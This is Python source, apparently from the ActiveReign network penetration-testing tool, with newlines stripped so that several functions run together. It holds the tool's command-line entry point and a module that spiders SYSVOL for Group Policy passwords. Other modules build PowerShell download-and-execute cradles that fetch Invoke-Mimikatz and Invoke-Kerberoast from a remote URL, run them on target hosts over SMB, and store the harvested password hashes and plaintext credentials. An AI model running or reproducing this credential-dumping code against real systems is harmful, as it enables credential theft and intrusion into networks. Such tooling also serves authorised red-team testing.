def main(): main_parser = argparse.ArgumentParser(description=banner(), formatter_class=argparse.RawTextHelpFormatter, usage=argparse.SUPPRESS) main_parser._optionals.title = 'Optional Arguments\n\033[1;30m>>-------------------->\033[1;m' main_parser.add_argument('-D', '--debug', dest="debug", action='store_true', help='Show debug messages & failed login attempts') main_parser.add_argument('-T', dest='max_threads', type=int, default=75, help='Max number of threads to use') main_parser.add_argument('--host-max', dest='max_host_threads', type=int, default=20, help='Max threads per host') main_parser.add_argument('-W', dest='workspace', type=str, default='', required=False, help='Manually set workspace, otherwise defaults to config file') sub_parser = main_parser.add_subparsers(title=' \nOperational Modes\n\033[1;30m>>-------------------->\033[1;m', dest='mode') db_args(sub_parser) enum_args(sub_parser) shell_args(sub_parser) spray_args(sub_parser) query_args(sub_parser) args = main_parser.parse_args() if len(argv) <= 2: main_parser.print_help();exit(1) if args.debug: log_level = logging.DEBUG else: log_level = logging.INFO # Init console logger loggers = {} loggers['console'] = setup_logger(log_level, 'ar3') # First checks & load config first_run_check(loggers['console']) config_obj = ConfigLoader() if not args.workspace: setattr(args, 'workspace', config_obj.WORKSPACE) first_workspace_check(args.workspace, loggers['console']) # Setup file logger loggers[args.mode] = setup_file_logger(args.workspace, args.mode) # Setup secondary loggers - use argv since arg_mods haven't been made yet if '--spider' in argv: loggers['spider'] = setup_file_logger(args.workspace, "spider") if '--gen-relay-list' in argv: loggers['relay_list'] = setup_file_logger(args.workspace, "relay_list") # Setup DB db_obj = Ar3db(args.workspace, loggers['console'], args.debug) try: # Start args = eval("{}_arg_mods(args, db_obj, loggers)".format(args.mode)) if args.debug: print_args(args, loggers['console']) ops = import_module("ar3.ops.{}".format(args.mode)) ops.main(args, config_obj, db_obj, loggers) except KeyboardInterrupt: print("\n[!] Key Event Detected, Closing...") exit(0) except Exception as e: print("[!] ActiveReign Error: {}".format(str(e)))
def run(self, target, args, smb_con, loggers, config_obj): # Define Target self.count = 0 if self.args['DC']['Value']: target = self.args['DC']['Value'] # Create custom spider config temp_config = config_obj temp_config.WHITELIST_EXT = ['xml'] temp_config.KEY_EXT = [] temp_config.KEY_WORDS = [] temp_config.REGEX = {"gpp_password": "******"} # Override args setattr(args, 'max_depth', 12) setattr(args, 'spider', False) # Create spider logger loggers['spider'] = setup_file_logger(args.workspace, "spider") # Start loggers['console'].info([ smb_con.host, smb_con.ip, "GPP_PASSWORD", "Searching \\\\{}\\SYSVOL\\".format(target) ]) spider(args, temp_config, loggers, smb_con.db, target, 'SYSVOL') loggers['console'].info( [smb_con.host, smb_con.ip, self.name.upper(), "Module complete"])
def run(self, target, args, smb_con, loggers, config_obj): logger = loggers['console'] timeout = args.timeout loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-Mimikatz']) try: # Define Script Source if args.fileless: srv_addr = get_local_ip() script_location = 'http://{}/Invoke-Mimikatz.ps1'.format(srv_addr) setattr(args, 'timeout', timeout + 60) else: script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1' setattr(args, 'timeout', timeout + 25) logger.debug('Script source: {}'.format(script_location)) # Setup PS1 Script cmd = """Invoke-Mimikatz -Command \"{}\"""".format(self.args['COMMAND']['Value']) launcher = powershell.gen_ps_iex_cradle(script_location, cmd) try: # Execute cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os) results = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True) # Display Output if not results: loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), 'No output returned']) return elif args.debug: for line in results.splitlines(): loggers['console'].debug([smb_con.host, smb_con.ip, self.name.upper(), line]) # Parse results and send creds to db db_updates = 0 for cred in self.parse_mimikatz(results): if cred[0] == "hash": smb_con.db.update_user(cred[2], '', cred[1], cred[3]) loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(),"{}\\{}:{}".format(cred[1],cred[2],cred[3])]) db_updates += 1 elif cred[0] == "plaintext": smb_con.db.update_user(cred[2], cred[3], cred[1], '') loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(),"{}\\{}:{}".format(cred[1], cred[2], cred[3])]) db_updates += 1 loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "{} credentials updated in database".format(db_updates)]) # write results to file file_name = 'mimikatz_{}_{}.txt'.format(target, get_filestamp()) tmp_logger = setup_file_logger(args.workspace, file_name, ext='') tmp_logger.info(results) loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "Output saved to: {}".format(file_name)]) except Exception as e: if str(e) == "list index out of range": loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), "{} failed".format(self.name)]) else: loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), str(e)]) except Exception as e: logger.debug("{} Error: {}".format(self.name, str(e)))
def run(self, target, args, smb_con, loggers, config_obj): logger = loggers['console'] timeout = args.timeout loggers['console'].info([ smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-Kerberoast' ]) try: # Define Script Source if args.fileless: srv_addr = get_local_ip() script_location = 'http://{}/Invoke-Kerberoast.ps1'.format( srv_addr) setattr(args, 'timeout', timeout + 30) else: script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1' setattr(args, 'timeout', timeout + 15) logger.debug('Script source: {}'.format(script_location)) # Setup PS1 Script launcher = powershell.gen_ps_iex_cradle(script_location, '') # Execute cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os) x = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True) # Display Output for line in x.splitlines(): loggers['console'].success( [smb_con.host, smb_con.ip, self.name.upper(), line]) # write results to file file_name = 'kerberoast_{}_{}.txt'.format(target, get_filestamp()) tmp_logger = setup_file_logger(args.workspace, file_name, ext='') tmp_logger.info(x) loggers['console'].info([ smb_con.host, smb_con.ip, self.name.upper(), "Output saved to: {}".format(file_name) ]) except Exception as e: logger.debug("{} Error: {}".format(self.name, str(e)))